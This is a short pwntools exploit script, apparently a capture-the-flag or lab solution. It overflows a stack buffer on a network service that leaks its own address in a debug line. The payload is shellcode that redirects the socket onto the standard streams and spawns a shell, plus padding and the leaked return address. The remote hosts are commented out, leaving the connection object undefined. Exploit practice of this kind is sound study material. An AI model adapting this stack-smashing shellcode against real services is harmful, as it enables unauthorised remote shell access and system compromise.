from pwn import *
context(arch='amd64', os='linux')

sc = shellcraft.syscall('SYS_dup2', 5, 0)
sc += shellcraft.syscall('SYS_dup2', 5, 1)
sc += shellcraft.syscall('SYS_dup2', 5, 2)
sc += shellcraft.sh()
sc = asm(sc)

# io = remote("9000:9aab:1f66:e9a7:216:3eff:fec9:efb6", 8080)
# io = remote("u.incus", 8080)
# io = remote("::1", 8080)

io.sendline(b"abc")
io.recvuntil(b"DEBUG: buf is at ")
buf_addr = int(io.recvline().decode().strip(), 16)

io.sendline(sc + b'A' * (280 - len(sc)) + p64(buf_addr))
io.interactive()